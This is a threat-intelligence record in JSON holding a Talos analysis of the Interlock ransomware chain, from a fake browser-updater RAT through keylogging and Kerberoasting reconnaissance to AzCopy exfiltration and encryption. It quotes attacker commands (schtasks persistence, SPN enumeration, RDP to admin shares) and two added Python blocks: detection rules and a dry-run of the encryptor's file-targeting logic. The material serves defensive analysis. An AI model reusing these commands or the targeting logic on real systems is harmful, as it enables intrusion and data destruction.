{
	"id": "152f7f8e-c8b3-4ea3-9035-d76f97803218",
	"created_at": "2026-04-06T00:18:56.311166Z",
	"updated_at": "2026-04-10T03:29:39.822017Z",
	"deleted_at": null,
	"sha1_hash": "9fd309f32f02d3c4d87ee342ddce50440291c64f",
	"title": "Unwrapping the emerging Interlock ransomware attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3752498,
	"plain_text": "Unwrapping the emerging Interlock ransomware attack\r\nBy Elio Biasiotto\r\nPublished: 2024-11-07 · Archived: 2026-04-05 19:54:48 UTC\r\nThursday, November 7, 2024 06:00\r\nCisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and\r\ndouble extortion attacks using the relatively new Interlock ransomware.  \r\nOur analysis uncovered that the attacker used multiple components in the delivery chain including a\r\nRemote Access Tool (RAT) masquerading as a fake browser updater, PowerShell scripts, a credential\r\nstealer, and a keylogger before deploying and enabling the ransomware encryptor binary. \r\nWe also observed that the attacker primarily used remote desktop protocol (RDP) to move laterally within\r\nthe victim’s network, as well as other tools such as AnyDesk and PuTTY. \r\nThe attacker used Azure Storage Explorer, which leverages the utility AZCopy, to exfiltrate the victim’s\r\ndata to an attacker-controlled Azure storage blob.  \r\nThe timeline of the attacker’s activity, from the initial compromise stage until the deployment of\r\nransomware encryptor binary, indicates their dwelling time in the victim’s environment was about 17\r\ndays.  \r\nTalos assesses with low confidence that Interlock ransomware is likely a new diversified group that\r\nemerged from Rhysida ransomware operators or developers, based on some similarities in the operators’\r\ntactics, techniques, and procedures (TTPs) and in the ransomware encryptor binaries. \r\nWho is Interlock? \r\nInterlock first appeared in public reporting in September 2024 and has been observed launching big-game hunting\r\nand double extortion attacks. The group has notably targeted businesses in a wide range of sectors, which at the\r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 1 of 14\n\ntime of reporting includes healthcare, technology, government in the U.S. 
and manufacturing in Europe, according to the data leak site disclosures, indicating that their targeting is opportunistic.\r\nLike other ransomware players in the big-game hunting space, Interlock also operates a data leak site called “Worldwide Secrets Blog,” providing links to victims’ leaked data, chat support for victim communications, and the email address “interlock@2mail[.]co”.\r\nIn their blog, Interlock claims to target organizations’ infrastructure by exploiting unaddressed vulnerabilities and claims their actions are in part motivated by a desire to hold companies accountable for poor cybersecurity, in addition to monetary gain.\r\nRecent attack methodologies\r\nThroughout the investigation into the Interlock ransomware attack, Talos observed several notable TTPs used by the attacker in each stage of the delivery chain. Talos assesses that the attacker was present in the victim’s environment for approximately 17 days, from the initial compromise until deployment and execution of the Interlock ransomware.\r\nInitial access\r\nThe attacker gained access to the victim machine via a fake Google Chrome browser updater executable that the victim was prompted to download from a compromised legitimate news website. When clicked, the fake browser updater executable “upd_2327991.exe” was downloaded onto the victim machine from a second compromised URL belonging to a legitimate retailer.\r\nExecution\r\nTalos IR discovered that the fake browser updater executable is a Remote Access Tool (RAT) that automatically executes an embedded PowerShell script when downloaded and run. The script initially downloads a legitimate Chrome setup executable “ChromeSetup.exe” to the victim machine’s application temporary folder and establishes persistence by dropping a Windows shortcut file named “fahhs.lnk” in the Windows StartUp folder, configured to run the RAT every time the victim logs in.\r\nSample PowerShell command that downloads the RAT.\r\nThe RAT executes the command “cmd.exe /c systeminfo” and collects the following information from the victim machine: Host Name, OS Name, OS Version, OS Manufacturer, OS Configuration, OS Build Type, Registered Owner, Registered Organization, Product ID, Original Install Date, System Boot Time, System Manufacturer, System Model, System Type, Processor(s), BIOS Version, Windows Directory, System Directory, Boot Device, Time Zone, Total Physical Memory, Available Physical Memory, Virtual Memory: Max Size, Virtual Memory: Available, Virtual Memory: In Use, Page File Location(s), Domain, Logon Server, Hotfix(s), Network Card(s), Connection Name, Status, DHCP Enabled, DHCP Server, IP address(es), Hyper-V Requirements and System Locale.\r\nThe RAT then encrypts the collected information in a memory stream. It establishes a secured socket to the command and control (C2) server hidden behind the attacker-controlled Cloudflare domain “apple-online[.]shop”, sends the encrypted data stream of victim machine information to the C2 server, and waits for the response.\r\nThe RAT also allowed the attacker to execute two other PowerShell commands on the victim machine, which download the encrypted data blobs of a credential stealer “cht.exe” and a keylogger binary “klg.dll”, decrypt them with the password “jgSkhg934@kjv#1vkfg2S” and run them. We observed that the keylogger is a DLL file that is run using the LOLBin “rundll32.exe”.\r\nA sample PowerShell command that downloads and runs the keylogger.\r\nDefense Evasion\r\nTalos IR observed that EDR was disabled on some of the compromised servers in the victim environment during the investigation. According to the indicators seen, Talos IR believes that the attacker could have either leveraged an EDR uninstaller tool or instrumented a vulnerable device driver, Sysmon.sys (TfSysMon.sys), to disable the EDR on the victim machine. We also observed the attacker’s attempts to delete the contents of the event logs on some of the compromised systems.\r\nCredential Access\r\nThe credential stealer discovered in this campaign is compiled in Golang. It enumerates the installed browser profiles on the victim machine and copies the Login Data, Login State, key4.db, browser history and bookmarks files to the victim’s application profile temporary folder. The stealer then processes the data and uses SQL queries to collect the login information of the victim’s online accounts along with the associated account URLs. Finally, the data is written to a file “chrgetpdsi.txt” in the user profile temporary folder.\r\nThe keylogger DLL running on the victim machine is a tiny executable which hooks the victim machine’s keyboard and logs keystrokes to a file called “conhost.txt” in the same folder where the keylogger was downloaded.\r\nDiscovery\r\nThe attacker ran PowerShell commands that are known indicators of pre-Kerberoasting reconnaissance. Kerberoasting requests service tickets for accounts that have a service principal name and cracks them offline to recover those accounts’ passwords, which can include domain admin credentials. We assess with moderate confidence that a Kerberoasting attack was used to obtain accounts with higher privileges.
\r\n(('AD_Computers: {0}' -f ([adsiSearcher]'(ObjectClass=computer)').FindAll().count)\r\n([adsisearcher]'(\u0026(objectCategory=user)(servicePrincipalName=*))').FindAll()\r\nLateral Movement\r\nTalos IR observed that the attacker primarily used Remote Desktop Protocol (RDP) and several compromised credentials to move between systems. Further analysis showed that the attacker also used AnyDesk and possibly LogMeIn to allow remote connectivity. We also spotted the installation of PuTTY on the compromised machines, which was likely used to move laterally to Linux hosts. We are not clear how these tools were dropped and executed on the infected machines.\r\nSample RDP command executions observed during our analysis, with the IP address details redacted, are shown below.\r\nmstsc /v 10.*.*.*\r\n.\\conhost.exe -d \\10.*.*.*\\e$\r\nCollection and Exfiltration\r\nThe attacker executed storage-explorer, a tool that allows users to manage and interact with Azure Storage, and AzCopy, which allows users to copy files to remote Azure storage, on the victim’s machine. Based on network artifact analysis, we believe that the attacker used storage-explorer to navigate and identify sensitive information in the victim network and executed AzCopy to upload the data to the Azure storage blob. We were not able to confirm how storage-explorer and AzCopy were delivered to the victim machine.\r\nImpact\r\nThe attacker deployed the Interlock ransomware encryptor binary with the file name “conhost.exe”, masquerading as a legitimate file, onto the victim machine and stored it in a folder named with a single-digit number (for example “3” or “4”) in the user profile application data temporary folder.\r\n
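\r\nDetection logic for several of the host-level TTPs described above (the adsisearcher SPN enumeration, rundll32 loading a module from the user temp folder, the encryptor named conhost.exe running outside System32, the -d argument pointed at a remote administrative share, the mstsc session, and AzCopy), as an added Python example that is not part of the Talos report. It runs over a handful of constructed event records modelled on Windows Security 4688 process-creation and PowerShell 4104 script-block events; the file paths, the 10.0.0.5 address, the blob URL and the rundll32 export name are assumptions rather than observed values, and reading conhost.exe -d against a share as the encryptor targeting that share is an interpretation of the command the report lists, not something the report states.

```python
import re

BS = chr(92)   # a backslash, built with chr() so the sample lines are not mangled by string escaping


def winpath(*parts):
    return BS.join(parts)


# Constructed sample events (not victim telemetry). 4688 = process creation, 4104 = script block.
TEMP = winpath('C:', 'Users', 'victim', 'AppData', 'Local', 'Temp')
SYS32 = winpath('C:', 'Windows', 'System32')
SAMPLE_EVENTS = [
    # Discovery: the SPN enumeration quoted in the report (Kerberoasting reconnaissance)
    {'id': 4104, 'image': '',
     'cmdline': '''([adsisearcher]'(&(objectCategory=user)(servicePrincipalName=*))').FindAll()'''},
    # Execution: keylogger DLL launched through rundll32 from the user temp folder (export name assumed)
    {'id': 4688, 'image': winpath(SYS32, 'rundll32.exe'),
     'cmdline': 'rundll32.exe ' + winpath(TEMP, 'klg.dll') + ',run'},
    # Impact: encryptor masquerading as conhost.exe, aimed at a remote admin share (address constructed)
    {'id': 4688, 'image': winpath(TEMP, '3', 'conhost.exe'),
     'cmdline': 'conhost.exe -d ' + BS + BS + '10.0.0.5' + BS + 'e$'},
    # Lateral movement: interactive RDP client
    {'id': 4688, 'image': winpath(SYS32, 'mstsc.exe'), 'cmdline': 'mstsc /v 10.0.0.5'},
    # Exfiltration: AzCopy upload to a storage account (URL constructed)
    {'id': 4688, 'image': winpath('C:', 'Tools', 'azcopy.exe'),
     'cmdline': 'azcopy copy ' + winpath('C:', 'Shares', 'Finance')
                + ' https://exfil.blob.core.windows.net/data?sv=2022 --recursive'},
    # Benign controls: the real console host and an ordinary script block
    {'id': 4688, 'image': winpath(SYS32, 'conhost.exe'),
     'cmdline': winpath(SYS32, 'conhost.exe') + ' 0xffffffff -ForceV1'},
    {'id': 4104, 'image': '', 'cmdline': 'Get-ChildItem -Path ' + winpath('C:', 'Temp')},
]


def normalize(text):
    # lower-case and unify path separators so every rule can match forward-slash forms only
    return text.replace(BS, '/').lower()


def r_kerberoast_recon(ev, img, cmd):
    return ev['id'] == 4104 and 'serviceprincipalname=*' in cmd


def r_rundll32_user_temp(ev, img, cmd):
    return img.endswith('/rundll32.exe') and '/appdata/local/temp/' in cmd


def r_conhost_masquerade(ev, img, cmd):
    # conhost.exe is only legitimate under System32; anywhere else it is a renamed binary
    return img.endswith('/conhost.exe') and not img.startswith('c:/windows/system32/')


def r_admin_share_target(ev, img, cmd):
    # the -d <share> form from the report: a remote administrative share such as //host/e$
    return re.search(' -d //[^ /]+/[a-z][$]', cmd) is not None


def r_rdp_client(ev, img, cmd):
    return img.endswith('/mstsc.exe') and ' /v ' in cmd


def r_azure_exfil(ev, img, cmd):
    return img.endswith('/azcopy.exe') or 'blob.core.windows.net' in cmd


RULES = [
    ('kerberoast_recon', r_kerberoast_recon, 'T1558.003'),
    ('rundll32_user_temp', r_rundll32_user_temp, 'T1218.011'),
    ('conhost_masquerade', r_conhost_masquerade, 'T1036.005'),
    ('admin_share_target', r_admin_share_target, 'T1021.002'),
    ('rdp_client', r_rdp_client, 'T1021.001'),
    ('azure_exfil', r_azure_exfil, 'T1567.002'),
]


def scan(events):
    # returns (event index, rule name, ATT&CK technique) for every rule that fires
    hits = []
    for idx, ev in enumerate(events):
        img, cmd = normalize(ev['image']), normalize(ev['cmdline'])
        for name, rule, technique in RULES:
            if rule(ev, img, cmd):
                hits.append((idx, name, technique))
    return hits


if __name__ == '__main__':
    for idx, name, technique in scan(SAMPLE_EVENTS):
        print(idx, name, technique, SAMPLE_EVENTS[idx]['cmdline'])
```

Replace SAMPLE_EVENTS with parsed records from a SIEM to use it on real data; the rules key only on the normalized image path and command line, so Sysmon Event ID 1 records work as well as Security 4688. The conhost.exe rule is the cheapest high-signal check here, since the legitimate console host never runs from a user temp folder, and the two benign records at the end of the list exist to confirm that neither it nor the script-block rule fires on ordinary activity.\r\n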
When run, the ransomware encrypts the targeted files on the victim machine, appending the file extension “.Interlock”, and drops the ransom note “!__README__!.txt” in every folder containing files that the encryptor has attempted to encrypt. Talos IR also observed that the attacker configured the ransom note to display during interactive login; this configuration was pushed using Group Policy Objects (GPOs), the Windows mechanism for centrally managing operating system and application settings.\r\nIn the ransom note, the attacker warns against attempting to recover the encrypted files and against rebooting the affected machines. They also demand a response within 96 hours, or else they threaten to release the victim's data on their leak site and notify media outlets, which could lead to financial and reputational damage.\r\nThe ransom note includes the URL of an onion site where affected victims can contact the operator to discuss the ransom demand and purchase the decryption keys, using a unique company ID of sixty alphanumeric characters generated for each victim.\r\nInterlock ransomware analysis\r\nTalos observed that Interlock ransomware has both a Windows Portable Executable (EXE) and a Linux executable (ELF) variant, indicating that the attacker is targeting both Windows and Linux machines.\r\nThe Interlock ransomware encryption binary is a 64-bit executable compiled on October 2, 2024. The ransomware appears on the victim’s machines in a packed executable format, with the custom unpacker code located in its Thread Local Storage (TLS) callback and several obfuscated stack strings in the binary that are decrypted at runtime.\r\nWhen the ransomware runs on the victim machine, it initializes itself by loading custom structures, strings, and Application Programming Interface (API) functions. After initialization, it enumerates the logical disk drives available on the victim machine. It first checks drive letters “A” through “Z”, excluding the C drive, picks the available logical drives, enumerates all the folders and files in them, and encrypts the targeted files, appending the file extension “.interlock” to encrypted files. Once those logical drives have been processed, the ransomware enumerates and encrypts the files in the folders of the C drive.\r\nDuring this enumeration, the ransomware excludes specific folders and file extensions from being encrypted. The operator hardcoded the folder and file extension exclusion lists, shown below, in the Interlock binary.\r\nFolder exclusion list of the Windows Interlock variant: $Recycle.Bin, Boot, Documents and Settings, PerfLogs, ProgramData, Recovery, System Volume Information, Windows, $RECYCLE.BIN, AppData, WindowsApps, Windows Defender, WindowsPowerShell, Windows Defender Advanced Threat Protection.\r\nFile extension exclusion list of the Windows Interlock variant: .bat, .bin, .cab, .cmd, .com, .cur, .diagcab, .diagcfg, .diagpkg, .drv, .hlp, .hta, .ico, .msi, .ocx, .psm1, .src, .sys, .ini, .url, .dll, .exe, .ps1, and the file Thumbs.db.\r\nThe Linux variant of the Interlock ransomware performs a similar enumeration of directories and files, starting from the root directory, and encrypts the files, excluding those that match the file extension exclusion list hardcoded in the binary.\r\nFile extension exclusion list of the Linux Interlock variant: boot, .cfg, .b00, .v00, .v01, .v02, .v03, .v04, .v05, .v06, .v07, .t00 (.b00, .v00 through .v07 and .t00 are the extensions used by VMware ESXi boot bank modules).\r\nInterlock ransomware uses the LibTomCrypt library, an open-source, comprehensive, modular and portable cryptographic library, for encryption. The Windows Interlock variant uses Cipher Block Chaining (CBC) mode to encrypt the files on the victim machine, whereas the Linux variant uses either CBC or RSA.\r\nEncryption routine in Windows variant\r\nEncryption routine in ELF variant\r\nAfter encrypting each of the targeted files on the victim machine, Interlock drops the ransom note “!__README__!.txt” in each of the enumerated folders.\r\nWindows variant ransom note function\r\nELF variant ransom note function\r\nWe observed that the Windows Interlock variant creates a Windows scheduled task named “TaskSystem” that runs daily at 8:00 PM on the victim machine as the SYSTEM user, executing the configured command to run the ransomware, which gives the ransomware persistence.\r\nschtasks /create /sc DAILY /tn “TaskSystem” /tr “cmd /c cd \"$Path of the Interlock binary\" \u0026\u0026 \"$command” /st 20:00 /ru system \u003e nul\r\nThe ransomware has the capability to delete itself after encrypting the targeted files, hiding the evidence of the encryption binary on the victim machine. To delete the encryption binary in the Windows variant, Interlock ransomware carries a tiny DLL embedded in its data section that is dropped into the user profile application temporary folder with the file name “tmp41.wasd”. Then, “rundll32.exe” is used to execute the DLL’s export function, called “run”, which calls the remove() function to delete the encryption binary.
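\r\nA dry-run reimplementation of the target selection just described (drive order with the C drive last, the hardcoded folder and extension exclusion lists, and a ransom-note location for every enumerated folder), as an added Python example that is not part of the Talos report and not code from the malware. It builds a small constructed directory tree under a temporary folder to stand in for the C and D volumes and only reports what the Windows variant would have touched; it encrypts nothing. Case-insensitive extension matching and exact matching of folder names are assumptions about the binary, not facts the report states.

```python
import os
import shutil
import string
import tempfile

# Exclusion lists of the Windows variant as listed in the report. Folder names are compared
# exactly as written, which is why both $Recycle.Bin and $RECYCLE.BIN appear (an assumption).
EXCLUDED_DIRS = {
    '$Recycle.Bin', 'Boot', 'Documents and Settings', 'PerfLogs', 'ProgramData', 'Recovery',
    'System Volume Information', 'Windows', '$RECYCLE.BIN', 'AppData', 'WindowsApps',
    'Windows Defender', 'WindowsPowerShell', 'Windows Defender Advanced Threat Protection',
}
EXCLUDED_EXTS = {
    '.bat', '.bin', '.cab', '.cmd', '.com', '.cur', '.diagcab', '.diagcfg', '.diagpkg', '.drv',
    '.hlp', '.hta', '.ico', '.msi', '.ocx', '.psm1', '.src', '.sys', '.ini', '.url', '.dll',
    '.exe', '.ps1',
}
EXCLUDED_NAMES = {'thumbs.db'}


def drive_order(drives):
    # A..Z with the C drive deferred to the end, the order the report describes
    others = [d for d in string.ascii_uppercase if d in drives and d != 'C']
    return others + (['C'] if 'C' in drives else [])


def is_target(filename):
    # extension compare is case-insensitive here (an assumption about the binary)
    low = filename.lower()
    return low not in EXCLUDED_NAMES and os.path.splitext(low)[1] not in EXCLUDED_EXTS


def enumerate_drive(letter, root):
    # one drive pass: prune excluded folders, pick target files, record every folder entered
    targets, note_dirs = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if d not in EXCLUDED_DIRS)
        rel = os.path.relpath(dirpath, root).replace(os.sep, '/')
        rel = '' if rel == '.' else rel
        note_dirs.append(letter + ':' + rel)
        for name in sorted(filenames):
            if is_target(name):
                targets.append(letter + ':' + (rel + '/' if rel else '') + name)
    return targets, note_dirs


def dry_run(drives):
    # drives maps a drive letter to a directory standing in for that volume
    targets, note_dirs = [], []
    for letter in drive_order(drives):
        found, entered = enumerate_drive(letter, drives[letter])
        targets += found
        note_dirs += entered
    return targets, note_dirs


def build_sample_tree(base):
    # constructed layout (not from the incident): two fake volumes with system, user and data content
    layout = [
        ('C', 'Windows/System32/kernel32.dll'),
        ('C', 'Users/victim/Documents/report.docx'),
        ('C', 'Users/victim/AppData/Local/cache.txt'),
        ('C', 'ProgramData/app/settings.ini'),
        ('C', '$Recycle.Bin/old.xlsx'),
        ('D', 'Data/finance.sqlite'),
        ('D', 'Data/deploy.ps1'),
        ('D', 'Data/Thumbs.db'),
    ]
    drives = {}
    for letter, rel in layout:
        root = drives.setdefault(letter, os.path.join(base, letter))
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w') as fh:
            fh.write('sample content')
    return drives


def demo():
    # builds the sample tree in a scratch directory, runs the selection, and cleans up
    base = tempfile.mkdtemp(prefix='interlock-dryrun-')
    try:
        return dry_run(build_sample_tree(base))
    finally:
        shutil.rmtree(base)


if __name__ == '__main__':
    targets, note_dirs = demo()
    print('would encrypt:', targets)
    print('would drop !__README__!.txt in:', note_dirs)
```

Run as a script it lists the would-be targets and note locations. Two things are worth noticing in the result: .exe, .dll and .ps1 files survive, so the host still boots and scripts still run after encryption, and AppData is pruned, so artifacts the report places in the user profile temporary folder (the stealer output chrgetpdsi.txt and the keylogger log conhost.txt) would remain unencrypted and available for forensic collection.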
\r\nThe Linux variant uses a similar technique to delete the encryptor binary from the victim machine, by executing the removeme function, which is an inline routine in the same encryptor binary.\r\nInterlock TTPs overlap with Rhysida ransomware\r\nTalos assesses with low confidence that Interlock ransomware is a new, diversified group that emerged from Rhysida operators or developers, based on some similarities in TTPs, tools, and the behaviors of the ransomware encryptor binaries.\r\nWe discovered code overlaps in the binaries of Interlock and Rhysida ransomware samples. Notably, the file and folder exclusion list hardcoded in the Windows variant of the Interlock ransomware has similarities with the exclusion list in Rhysida ransomware, reported by Talos in an August 2023 Threat Advisory.\r\nAdditionally, the Interlock ransomware encryptor with the filename “conhost.exe” was earlier seen in Rhysida ransomware attacks, along with overlaps in TTPs and tools including PowerShell scripts, AnyDesk, and PuTTY, based on a CISA #StopRansomware advisory on Rhysida ransomware. Furthermore, both Rhysida and Interlock operators use AzCopy to exfiltrate the victim’s data to an attacker-controlled Azure storage blob, an old but uncommon technique.\r\nFinally, Interlock and Rhysida deliver ransom notes with a similar theme, in which they portray themselves as a helpful partner notifying the victim of a breach and offering to help rectify it. This is in contrast to other prolific and sophisticated cyber groups, such as Black Basta and ALPHV, whose ransom notes demand payment, threaten, and attempt to intimidate the victim.\r\nRhysida ransom note.\r\nInterlock ransom note.\r\nInterlock’s possible affiliation with Rhysida operators or developers would align with several broader trends in the cyber threat landscape, which Talos reported in our 2022 and 2023 Year in Review reports. We observed ransomware groups diversifying their capabilities to support more advanced and varied operations, and ransomware groups have been growing less siloed, as we observed operators increasingly working alongside multiple ransomware groups.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\r\nAdditional protection with context for your specific environment and threat data is available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64114, 64113, 64189 and 301042.\r\nClamAV detections are also available for this threat:\r\nWin.Ransomware.Interlock-10036524-0\r\nUnix.Ransomware.Interlock-10036662-0\r\nWin.Trojan.Kryptik-10036729-0\r\nWin.Downloader.Kryptik-10036730-0\r\nIndicators of Compromise\r\nIOCs for this threat can be found in our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/emerging-interlock-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/emerging-interlock-ransomware/"
	],
	"report_names": [
		"emerging-interlock-ransomware"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434736,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.pdf",
		"text": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.txt",
		"img": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.jpg"
	}
}